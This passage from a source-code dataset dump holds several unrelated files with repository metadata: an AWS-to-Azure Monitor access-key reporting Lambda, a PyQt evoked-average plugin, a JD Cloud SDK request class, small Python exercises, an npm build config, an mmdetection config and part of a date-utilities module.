] | permissive | is-rishabhs/azure_monitor_poc | cf73800135720c2107032e00d0e2d23716dd0aff | 0b41083a29781fee2a7b39847c625cdb694a36ba | refs/heads/master | 2022-01-22T19:57:51.501249 | 2019-07-14T23:06:28 | 2019-07-14T23:06:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,190 | py | import json
import logging
import re
import csv
import boto3
import os
import hmac
import base64
import hashlib
import datetime
from io import StringIO
from datetime import datetime
from botocore.vendored import requests
# Parse the IAM User ARN to extract the AWS account number
def parse_arn(arn_string):
acct_num = re.findall(r'(?<=:)[0-9]{12}',arn_string)
return acct_num[0]
# Convert timestamp to one more compatible with Azure Monitor
def transform_datetime(awsdatetime):
transf_time = awsdatetime.strftime("%Y-%m-%dT%H:%M:%S")
return transf_time
# Query for a list of AWS IAM Users
def query_iam_users():
todaydate = (datetime.now()).strftime("%Y-%m-%d")
users = []
client = boto3.client(
'iam'
)
paginator = client.get_paginator('list_users')
response_iterator = paginator.paginate()
for page in response_iterator:
for user in page['Users']:
user_rec = {'loggedDate':todaydate,'username':user['UserName'],'account_number':(parse_arn(user['Arn']))}
users.append(user_rec)
return users
# Query for a list of access keys and information on access keys for an AWS IAM User
def query_access_keys(user):
keys = []
client = boto3.client(
'iam'
)
paginator = client.get_paginator('list_access_keys')
response_iterator = paginator.paginate(
UserName = user['username']
)
# Get information on access key usage
for page in response_iterator:
for key in page['AccessKeyMetadata']:
response = client.get_access_key_last_used(
AccessKeyId = key['AccessKeyId']
)
# Santize key before sending it along for export
sanitizedacctkey = key['AccessKeyId'][:4] + '...' + key['AccessKeyId'][-4:]
# Create new dictonionary object with access key information
if 'LastUsedDate' in response.get('AccessKeyLastUsed'):
key_rec = {'loggedDate':user['loggedDate'],'user':user['username'],'account_number':user['account_number'],
'AccessKeyId':sanitizedacctkey,'CreateDate':(transform_datetime(key['CreateDate'])),
'LastUsedDate':(transform_datetime(response['AccessKeyLastUsed']['LastUsedDate'])),
'Region':response['AccessKeyLastUsed']['Region'],'Status':key['Status'],
'ServiceName':response['AccessKeyLastUsed']['ServiceName']}
keys.append(key_rec)
else:
key_rec = {'loggedDate':user['loggedDate'],'user':user['username'],'account_number':user['account_number'],
'AccessKeyId':sanitizedacctkey,'CreateDate':(transform_datetime(key['CreateDate'])),'Status':key['Status']}
keys.append(key_rec)
return keys
def build_signature(customer_id, shared_key, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(
hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id,encoded_hash)
return authorization
def post_data(customer_id, shared_key, body, log_type):
    """POST a JSON payload to the Azure Monitor HTTP Data Collector API.

    Args:
        customer_id: Log Analytics workspace id.
        shared_key: base64-encoded workspace shared key.
        body: JSON string to send.
        log_type: custom log type name for the Log-Type header.
    """
    method = 'POST'
    content_type = 'application/json'
    resource = '/api/logs'
    # The signature must be computed over the exact same date string sent
    # in the x-ms-date header
    rfc1123date = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
    signature = build_signature(
        customer_id, shared_key, rfc1123date, len(body), method, content_type, resource
    )
    uri = 'https://' + customer_id + '.ods.opinsights.azure.com' + resource + '?api-version=2016-04-01'
    headers = {
        'content-type': content_type,
        'Authorization': signature,
        'Log-Type': log_type,
        'x-ms-date': rfc1123date,
    }
    response = requests.post(uri, data=body, headers=headers)
    # Any 2xx status means the payload was accepted
    if 200 <= response.status_code <= 299:
        print("Accepted")
    else:
        print("Response code: {}".format(response.status_code))
def lambda_handler(event, context):
    """AWS Lambda entry point.

    Collects access-key usage records for every IAM user and ships them to
    Azure Monitor via the HTTP Data Collector API. Workspace credentials and
    the log type are read from the WorkspaceId / WorkspaceKey / LogName
    environment variables. Errors are logged rather than propagated.
    """
    # Enable logging to console
    logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
    try:
        logging.info("Retrieving a list of IAM Users...")
        users = query_iam_users()
        logging.info("Retrieving a listing of access keys for each IAM User...")
        # One flat list of key records across all users
        key_records = [record for user in users for record in query_access_keys(user)]
        # Serialize and ship to Azure Monitor
        body = json.dumps(key_records)
        post_data(os.environ['WorkspaceId'], os.environ['WorkspaceKey'], body, os.environ['LogName'])
    except Exception:
        logging.error("Execution error", exc_info=True)
| [
"noreply@github.com"
] | is-rishabhs.noreply@github.com |
a7806cbd020f9a30ef0b3337e9f90d839d99a427 | da92caf06447ec7e244dfa11e71b551a4dab7d14 | /src/plugins/evoked_average.py | 21e26af5a91a55b09c07c45812ed17bb1e6ac9ab | [
"MIT"
] | permissive | Frikster/Mesoscale-Brain-Explorer | 28298adbcb49dc399f85fe4db1c3dc1263468677 | 269d8f18162e2b9dca4619561e73a6beb8ba810c | refs/heads/master | 2020-04-04T22:17:29.714298 | 2017-11-20T16:24:19 | 2017-11-20T16:24:19 | 61,849,037 | 5 | 6 | null | null | null | null | UTF-8 | Python | false | false | 4,036 | py | #!/usr/bin/env python3
import os
import numpy as np
import psutil
import qtutil
from PyQt4.QtGui import *
from .util import project_functions as pfs
from .util.plugin import PluginDefault
from .util.plugin import WidgetDefault
class Widget(QWidget, WidgetDefault):
    """Plugin widget that computes an evoked (trial-averaged) image stack.

    The evoked average is computed frame-by-frame: frame ``i`` of the output
    is the mean of frame ``i`` across every selected stack, truncated to the
    length of the shortest stack.
    """

    class Labels(WidgetDefault.Labels):
        pass

    class Defaults(WidgetDefault.Defaults):
        # suffix appended to output file names when saving into the project
        manip = 'evoked-avg'

    def __init__(self, project, plugin_position, parent=None):
        super(Widget, self).__init__(parent)
        if not project or not isinstance(plugin_position, int):
            return
        self.avg_button = QPushButton('Generate Evoked Average')
        WidgetDefault.__init__(self, project, plugin_position)

    def setup_ui(self):
        super().setup_ui()
        self.vbox.addWidget(self.avg_button)

    def setup_signals(self):
        super().setup_signals()
        self.avg_button.clicked.connect(self.execute_primary_function)

    def execute_primary_function(self, input_paths=None):
        """Average the selected (or given) stacks and save the result.

        Args:
            input_paths: optional explicit list of .npy stack paths; falls
                back to the stacks currently selected in the UI.

        Returns:
            str | None: path of the saved averaged stack, or None if fewer
            than two stacks were selected.
        """
        if not input_paths:
            if not self.selected_videos:
                return
            else:
                selected_videos = self.selected_videos
        else:
            selected_videos = input_paths

        progress_global = QProgressDialog('Creating evoked average...', 'Abort', 0, 100, self)
        progress_global.setAutoClose(True)
        progress_global.setMinimumDuration(0)

        def global_callback(x):
            progress_global.setValue(x * 100)
            QApplication.processEvents()

        filenames = selected_videos
        if len(filenames) < 2:
            qtutil.warning('Select multiple files to average.')
            return
        # memory-map the stacks so only one frame per stack is resident at a time
        stacks = [np.load(f, mmap_mode='r') for f in filenames]
        lens = [len(stacks[x]) for x in range(len(stacks))]
        min_lens = np.min(lens)
        breadth = stacks[0].shape[1]
        length = stacks[0].shape[2]
        # BUG FIX: each averaged frame has shape (breadth, length) ==
        # stacks[0].shape[1:], so the output buffer must use the same axis
        # order. The previous (min_lens, length, breadth) ordering raised a
        # ValueError on assignment for non-square frames.
        trig_avg = np.empty((min_lens, breadth, length), np.load(filenames[0], mmap_mode='r').dtype)
        for frame_index in range(min_lens):
            global_callback(frame_index / min_lens)
            frames_to_avg = [stacks[stack_index][frame_index]
                             for stack_index in range(len(stacks))]
            frames_to_avg = np.array(frames_to_avg, dtype=np.float32)
            avg = np.mean(frames_to_avg, axis=0, dtype=np.float32)
            trig_avg[frame_index] = avg
        global_callback(1)

        manip = self.Defaults.manip + '_' + str(len(filenames))
        output_path = pfs.save_project(filenames[0], self.project, trig_avg, manip, 'video')
        pfs.refresh_list(self.project, self.video_list,
                         self.params[self.Labels.video_list_indices_label],
                         self.Defaults.list_display_type,
                         self.params[self.Labels.last_manips_to_display_label])
        return output_path

    def setup_whats_this(self):
        super().setup_whats_this()
        self.avg_button.setWhatsThis("Generate evoked average for selected image stacks where each frame is averaged "
                                     "across image stacks for each frame")
class MyPlugin(PluginDefault):
    """Registers the evoked-average widget with the plugin framework."""

    def __init__(self, project, plugin_position):
        self.name = 'Evoked Average'
        self.widget = Widget(project, plugin_position)
        super().__init__(self.widget, self.widget.Labels, self.name)

    def check_ready_for_automation(self, expected_input_number):
        """Return True only if all selected files fit in available memory."""
        self.summed_filesize = sum(
            os.path.getsize(path) for path in self.widget.selected_videos
        )
        # index 1 of psutil.virtual_memory() is the 'available' field
        self.available = list(psutil.virtual_memory())[1]
        return self.summed_filesize <= self.available

    def automation_error_message(self):
        """Explain why automation was refused."""
        return ("Not enough memory. All files to be averaged together are of size ~"
                + str(self.summed_filesize)
                + " and available memory is: " + str(self.available))
| [
"dirk.haupt@gmail.com"
] | dirk.haupt@gmail.com |
9fa71db652f5ba9a7efaf6487c314e53826c6153 | 187a6558f3c7cb6234164677a2bda2e73c26eaaf | /jdcloud_sdk/services/tidb/apis/DescribeAvailableDBInfoInternelRequest.py | e771d081b365e9d329da6981125f9fced96c4cf4 | [
"Apache-2.0"
] | permissive | jdcloud-api/jdcloud-sdk-python | 4d2db584acc2620b7a866af82d21658cdd7cc227 | 3d1c50ed9117304d3b77a21babe899f939ae91cd | refs/heads/master | 2023-09-04T02:51:08.335168 | 2023-08-30T12:00:25 | 2023-08-30T12:00:25 | 126,276,169 | 18 | 36 | Apache-2.0 | 2023-09-07T06:54:49 | 2018-03-22T03:47:02 | Python | UTF-8 | Python | false | false | 1,479 | py | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class DescribeAvailableDBInfoInternelRequest(JDCloudRequest):
    """
    Query the basic information supported by TiDB.
    """

    def __init__(self, parameters, header=None, version="v1"):
        # GET /regions/{regionId}/instances:describeAvailableDBInfoInternel
        super(DescribeAvailableDBInfoInternelRequest, self).__init__(
            '/regions/{regionId}/instances:describeAvailableDBInfoInternel', 'GET', header, version)
        # DescribeAvailableDBInfoInternelParameters instance providing the
        # path/query values substituted into the URL above
        self.parameters = parameters
class DescribeAvailableDBInfoInternelParameters(object):
    """Parameter holder for the describeAvailableDBInfoInternel API call."""

    def __init__(self, regionId):
        """
        :param regionId: region code
        """
        self.regionId = regionId
        # optional filter: availability zones, multiple values separated by ','
        self.azs = None

    def setAzs(self, azs):
        """
        :param azs: (Optional) availability zones [separate multiple values with ',']
        """
        self.azs = azs
| [
"jdcloud-api@jd.com"
] | jdcloud-api@jd.com |
47d31b4ad6d9d3f9ec16487c975797465de7096d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/22/usersdata/112/11794/submittedfiles/av1_2.py | 5ecfae8a8c59536c3785bab3a905bd43d390601a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
# Read the four values to compare (prompts in Portuguese).
# NOTE: input() returns strings, so comparisons below are string comparisons.
n = input('Digite o valor de n:')
j = input('Digite o valor de j:')
k = input('Digite o valor de k:')
l = input('Digite o valor de l:')
# Bug fixes versus the original:
#  - removed 'meio=B' (B was undefined -> NameError) and the unused ant/prox
#  - '=' in the conditions was assignment syntax, not comparison ('==')
#  - the final branch built the string 'falsa' without printing it
# Prints 'verdadeira' when exactly one of the pairs (n,k) / (j,l) matches.
if n == k and j != l:
    print('verdadeira')
elif j == l and n != k:
    print('verdadeira')
else:
    print('falsa')
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
c37ed597fb842119267de7b488c688f3712ddb3e | 82ebbf9effde97aacfce1521f892c9db6b687678 | /no171_ExcelSheetcolumnNumber.py | 97c0b29d0f960d474361710bb5c6f6b9d47f1adf | [] | no_license | echocho/Leetcode | 970fee27c7e3208506d9be436f855197b7fbd7a1 | 143707c6ec3bba8b5292263f050cc2e9dd71782c | refs/heads/master | 2020-03-20T15:14:08.102392 | 2019-11-03T13:33:55 | 2019-11-03T13:33:55 | 137,507,580 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | class Solution:
def titleToNumber(self, s):
"""
:type s: str
:rtype: int
"""
if not s:
return 0
if len(s) == 1:
return ord(s) - 64
res = 0
to_process = list(zip([chrt for chrt in s], [i for i in range(len(s) - 1, -1, -1)]))
for i, j in to_process:
res += (ord(i) - 64) * 26**j
return res | [
"echo333cheng@gmail.com"
] | echo333cheng@gmail.com |
5f92a68942366f13168520456b595bc485f6b9d7 | 24c51e4b245bbed66b43a8409dc675f3d65c70fa | /node_modules/fsevents/build/config.gypi | 27fc5aa84b5bc5c50055bf5e08367ababecd3da5 | [
"MIT"
] | permissive | kristofermc/thirdapp | 6bd0d1be7ea1769f2f691c952a17105740536bbd | 9a6823f044a6dfd7e304a260e0cab4a4874affb5 | refs/heads/master | 2022-12-23T14:51:40.635042 | 2020-10-02T15:55:10 | 2020-10-02T15:55:10 | 300,654,313 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,658 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"build_v8_with_gn": "false",
"coverage": "false",
"dcheck_always_on": 0,
"debug_nghttp2": "false",
"debug_node": "false",
"enable_lto": "false",
"enable_pgo_generate": "false",
"enable_pgo_use": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt67l.dat",
"icu_default_data": "",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "67",
"is_debug": 0,
"llvm_version": "11.0",
"napi_build_version": "6",
"node_byteorder": "little",
"node_debug_lib": "false",
"node_enable_d8": "false",
"node_install_npm": "true",
"node_module_version": 72,
"node_no_browser_globals": "false",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_brotli": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_nghttp2": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_target_type": "executable",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_node_code_cache": "true",
"node_use_node_snapshot": "true",
"node_use_openssl": "true",
"node_use_v8_platform": "true",
"node_with_ltcg": "false",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_is_fips": "false",
"shlib_suffix": "72.dylib",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_enable_lite_mode": 0,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 1,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_use_siphash": 1,
"v8_use_snapshot": 1,
"want_separate_host_toolset": 0,
"xcode_version": "11.0",
"nodedir": "/Users/kristofer/Library/Caches/node-gyp/12.18.3",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"commit_hooks": "true",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"sign_git_commit": "",
"audit": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/bash",
"metrics_registry": "https://registry.npmjs.org/",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"timing": "",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"preid": "",
"fetch_retries": "2",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"logs_max": "10",
"prefer_online": "",
"cache_lock_retries": "10",
"global_style": "",
"update_notifier": "true",
"audit_level": "low",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"offline": "",
"read_only": "",
"searchlimit": "20",
"access": "",
"json": "",
"allow_same_version": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/kristofer/.npm-init.js",
"userconfig": "/Users/kristofer/.npmrc",
"cidr": "",
"node_version": "12.18.3",
"user": "",
"save": "true",
"auth_type": "legacy",
"editor": "vi",
"ignore_prepublish": "",
"script_shell": "",
"tag": "latest",
"before": "",
"global": "",
"progress": "true",
"ham_it_up": "",
"optional": "true",
"searchstaleness": "900",
"bin_links": "true",
"force": "",
"save_prod": "",
"searchopts": "",
"depth": "Infinity",
"node_gyp": "/usr/local/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js",
"rebuild_bundle": "true",
"sso_poll_frequency": "500",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"scripts_prepend_node_path": "warn-only",
"sso_type": "oauth",
"strict_ssl": "true",
"tag_version_prefix": "v",
"save_exact": "true",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"cache_lock_stale": "60000",
"prefer_offline": "",
"version": "",
"cache_min": "10",
"otp": "",
"cache": "/Users/kristofer/.npm",
"searchexclude": "",
"color": "true",
"package_lock": "true",
"fund": "true",
"package_lock_only": "",
"save_optional": "",
"user_agent": "npm/6.14.8 node/v12.18.3 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"send_metrics": "",
"init_version": "1.0.0",
"node_options": "",
"umask": "0022",
"scope": "",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/var/folders/ym/6mmm0kvj26l2rlpd4r796mzw0000gn/T",
"unsafe_perm": "true",
"format_package_lock": "true",
"link": "",
"prefix": "/usr/local"
}
}
| [
"kris.jussi@gmail.com"
] | kris.jussi@gmail.com |
aa374c01766824db62b8defc0771600be2b6ba24 | 8c21cba5aceb7ce80736e870be18028e1a18a611 | /connect_server_proverka.py | d3dd3f10385d886c13c98238e0d5bd029b6b3730 | [] | no_license | MadimTor/hackaton | 31babb638652409ac62c382fb899a7d515db86ba | 0aecee868734a3aa7de1a64d8dc76ec67945fdb8 | refs/heads/main | 2023-05-31T06:12:08.717508 | 2021-06-20T10:55:06 | 2021-06-20T10:55:06 | 378,538,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | import socket
def connect(ip):
    """Connect to ``ip`` on port 9095, print the server's greeting and return it.

    Args:
        ip: host name or IP address of the server.

    Returns:
        str: the decoded message received from the server (up to 1024 bytes).
    """
    # Context manager guarantees the socket is closed even on error
    # (the original leaked the file descriptor).
    with socket.socket() as sock:
        sock.connect((ip, 9095))
        data = sock.recv(1024).decode()
    print(data)
    return data
| [
"noreply@github.com"
] | MadimTor.noreply@github.com |
9c125735232060d0d2ab96a7273d2ed807cb7f56 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/detection/YOLOX_ID2833_for_PyTorch/configs/mask2former/mask2former_swin-b-p4-w12-384-in21k_lsj_8x2_50e_coco-panoptic.py | 0141271ed055de4c1cb757b1cf83099916ad3b24 | [
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 941 | py |
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) Open-MMLab. All rights reserved.
# Inherit the full training setup from the ImageNet-1k Swin-B config and only
# swap the backbone initialization to the ImageNet-21k pre-trained checkpoint.
_base_ = ['./mask2former_swin-b-p4-w12-384_lsj_8x2_50e_coco-panoptic.py']
pretrained = 'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window12_384_22k.pth'  # noqa
# Load the 21k weights into the backbone only; heads keep the base config init.
model = dict(
    backbone=dict(init_cfg=dict(type='Pretrained', checkpoint=pretrained)))
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
870d12fe6a587e970c108504b42268cb10c844f3 | 2ed2dd917afb05d194e87f989d78953b31a5781b | /lesson10/mission08.py | 718005e6a8b1523d4636183b46dc3a00179e899b | [] | no_license | RenegaDe1288/pythonProject | 4058d549db7c37652f77438c31f8b31476497d98 | 801c06f3be22ed63214987b11d6f1b3fd2fe5b44 | refs/heads/master | 2023-08-17T13:20:50.777842 | 2021-10-05T10:51:00 | 2021-10-05T10:51:00 | 393,145,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | lent = int(input('Введите ширину '))
lent_2 = int(input('Введите длину '))
for row in range(lent):
for col in range(lent_2):
if col == lent_2 // 2 and row != lent//2:
print('|', end='')
elif row == lent // 2:
print('-', end='')
elif col == lent_2//2 + 5+ row:
print('\\', end='')
elif col == lent_2//2- row -5:
print('/', end='')
else:
print(' ', end='')
print()
| [
"D121188@yandex.ru"
] | D121188@yandex.ru |
22272935b9af79706810d4e840cdc228f37b064f | 65388597294f4174ad82c7ccc65d611ce278d2a8 | /tcex/tcex/utils/date_utils.py | b2b5f664775424cb7284a59a84a134e81ac42ee2 | [] | no_license | ThreatConnect-Inc/threatconnect-developer-docs | 5e13bafa14a7418d14c84f62fa0672690ebeb991 | 3c681a04cef29c5347090b687dfd4e1a28ba3efd | refs/heads/master | 2023-08-07T11:39:36.267492 | 2023-07-28T15:31:07 | 2023-07-28T15:31:07 | 78,577,108 | 8 | 19 | null | 2023-07-21T14:15:20 | 2017-01-10T21:46:46 | Python | UTF-8 | Python | false | false | 12,709 | py | """TcEx Datetime Utilities Module"""
# standard library
import calendar
import math
import re
import time
from datetime import datetime
from typing import Optional, Tuple, Union
# third-party
import parsedatetime as pdt
import pytz
from dateutil import parser
from dateutil.relativedelta import relativedelta
from tzlocal import get_localzone
class DatetimeUtils:
    """TcEx framework Datetime Utils module"""

    @staticmethod
    def _replace_timezone(dateutil_parser: object) -> object:
        """Replace the timezone on a datetime object.

        Args:
            dateutil_parser: The dateutil object.

        Returns:
            object: Updated dateutils object.
        """
        try:
            # try to get the timezone from tzlocal
            tzinfo = pytz.timezone(get_localzone().zone)
        except pytz.exceptions.UnknownTimeZoneError:  # pragma: no cover
            try:
                # try to get the timezone from python's time package
                tzinfo = pytz.timezone(time.tzname[0])
            except pytz.exceptions.UnknownTimeZoneError:
                # seeing as all else has failed: use UTC as the timezone
                tzinfo = pytz.timezone('UTC')
        return tzinfo.localize(dateutil_parser)

    def any_to_datetime(self, time_input: str, tz: Optional[str] = None) -> datetime:
        """Return datetime object from multiple formats.

        Formats:

        #. Human Input (e.g 30 days ago, last friday)
        #. ISO 8601 (e.g. 2017-11-08T16:52:42Z)
        #. Loose Date format (e.g. 2017 12 25)
        #. Unix Time/Posix Time/Epoch Time (e.g. 1510686617 or 1510686617.298753)

        Args:
            time_input: The time input string (see formats above).
            tz: The time zone for the returned data.

        Returns:
            (datetime.datetime): Python datetime.datetime object.

        Raises:
            RuntimeError: If none of the parsers can interpret time_input.
        """
        # handle timestamp (e.g. 1510686617 or 1510686617.298753)
        dt_value: Optional[object] = self.unix_time_to_datetime(time_input, tz)

        # handle ISO or other formatted date (e.g. 2017-11-08T16:52:42Z,
        # 2017-11-08T16:52:42.400306+00:00)
        if dt_value is None:
            dt_value: Optional[object] = self.date_to_datetime(time_input, tz)

        # handle human readable relative time (e.g. 30 days ago, last friday)
        if dt_value is None:
            dt_value: Optional[object] = self.human_date_to_datetime(time_input, tz)

        # if all attempt to convert fail raise an error
        if dt_value is None:
            raise RuntimeError(f'Could not format input ({time_input}) to datetime string.')

        return dt_value

    def chunk_date_range(
        self,
        start_date: Union[int, str, datetime],
        end_date: Union[int, str, datetime],
        chunk_size: int,
        chunk_unit: Optional[str] = 'months',
        date_format: Optional[str] = None,
    ) -> Tuple[Union[datetime, str], Union[datetime, str]]:
        """Chunk a date range based on unit and size

        Args:
            start_date: Date time expression or datetime object.
            end_date: Date time expression or datetime object.
            chunk_size: Chunk size for the provided units.
            chunk_unit: A value of (years, months, days, weeks, hours, minutes, seconds)
            date_format: If None datetime object will be returned. Any other value
                must be a valid strftime format (%s for epoch seconds).

        Yields:
            Tuple[Union[datetime, str], Union[datetime, str]]: Either a datetime object
                or a string representation of the date.
        """
        # define relative delta settings
        relative_delta_settings = {chunk_unit: +chunk_size}

        # normalize inputs into datetime objects
        if isinstance(start_date, (int, str)):
            start_date = self.any_to_datetime(start_date, 'UTC')
        if isinstance(end_date, (int, str)):
            end_date = self.any_to_datetime(end_date, 'UTC')

        # set sd value for iteration
        sd = start_date
        # set ed value the the smaller of end_date or relative date
        ed = min(end_date, start_date + relativedelta(**relative_delta_settings))

        while 1:
            sdf = sd
            edf = ed
            if date_format is not None:
                # format the response data to a date formatted string
                sdf = self.format_datetime(sd.isoformat(), 'UTC', date_format)
                edf = self.format_datetime(ed.isoformat(), 'UTC', date_format)

            # yield chunked data
            yield sdf, edf

            # break iteration once chunked ed is gte to provided end_date
            if ed >= end_date:
                break

            # update sd and ed values for next iteration
            sd = ed
            ed = min(end_date, sd + relativedelta(**relative_delta_settings))

    def date_to_datetime(self, time_input: str, tz: Optional[str] = None) -> datetime:
        """Convert ISO 8601 and other date strings to datetime.datetime type.

        Args:
            time_input: The time input string (see formats above).
            tz: The time zone for the returned data.

        Returns:
            (datetime.datetime): Python datetime.datetime object, or None when
            time_input cannot be parsed as a date.
        """
        dt = None
        try:
            # dt = parser.parse(time_input, fuzzy_with_tokens=True)[0]
            dt: object = parser.parse(time_input)
            # don't convert timezone if dt timezone already in the correct timezone
            if tz is not None and tz != dt.tzname():
                if dt.tzinfo is None:
                    dt = self._replace_timezone(dt)
                dt = dt.astimezone(pytz.timezone(tz))
        except IndexError:  # pragma: no cover
            pass
        except TypeError:  # pragma: no cover
            pass
        except ValueError:
            pass
        return dt

    def format_datetime(
        self, time_input: str, tz: Optional[str] = None, date_format: Optional[str] = None
    ) -> str:
        """Return timestamp from multiple input formats.

        Formats:

        #. Human Input (e.g 30 days ago, last friday)
        #. ISO 8601 (e.g. 2017-11-08T16:52:42Z)
        #. Loose Date format (e.g. 2017 12 25)
        #. Unix Time/Posix Time/Epoch Time (e.g. 1510686617 or 1510686617.298753)

        .. note:: To get a unix timestamp format use the strftime format **%s**. Python
                  does not natively support **%s**, however this method has support.

        Args:
            time_input: The time input string (see formats above).
            tz: The time zone for the returned data.
            date_format: The strftime format to use, ISO by default.

        Returns:
            (string): Formatted datetime string.
        """
        # handle timestamp (e.g. 1510686617 or 1510686617.298753)
        dt_value = self.any_to_datetime(time_input, tz)

        # format date
        if date_format == '%s':
            # python strftime has no portable %s; emulate epoch seconds
            dt_value = calendar.timegm(dt_value.timetuple())
        elif date_format:
            dt_value = dt_value.strftime(date_format)
        else:
            dt_value = dt_value.isoformat()

        return dt_value

    def human_date_to_datetime(
        self, time_input: str, tz: Optional[str] = None, source_datetime: Optional[datetime] = None
    ) -> datetime:
        """Convert human readable date (e.g. 30 days ago) to datetime.datetime.

        Examples:

        * August 25th, 2008
        * 25 Aug 2008
        * Aug 25 5pm
        * 5pm August 25
        * next saturday
        * tomorrow
        * next thursday at 4pm
        * at 4pm
        * eod
        * tomorrow eod
        * eod tuesday
        * eoy
        * eom
        * in 5 minutes
        * 5 minutes from now
        * 5 hours before now
        * 2 hours before noon
        * 2 days from tomorrow

        Args:
            time_input: The time input string (see formats above).
            tz: The time zone for the returned datetime.
            source_datetime: The reference or source datetime.

        Returns:
            (datetime.datetime): Python datetime.datetime object, or None when
            parsedatetime cannot interpret the input.
        """
        c = pdt.Constants('en')
        cal = pdt.Calendar(c, version=2)
        tzinfo = None
        src_tzname = None
        if source_datetime is not None:
            tzinfo = source_datetime.tzinfo
            src_tzname = source_datetime.tzname()
        try:
            dt, status = cal.parseDT(time_input, sourceTime=source_datetime, tzinfo=tzinfo)
            if tz is not None:  # don't add tz if no tz value is passed
                if dt.tzinfo is None:
                    dt = self._replace_timezone(dt)
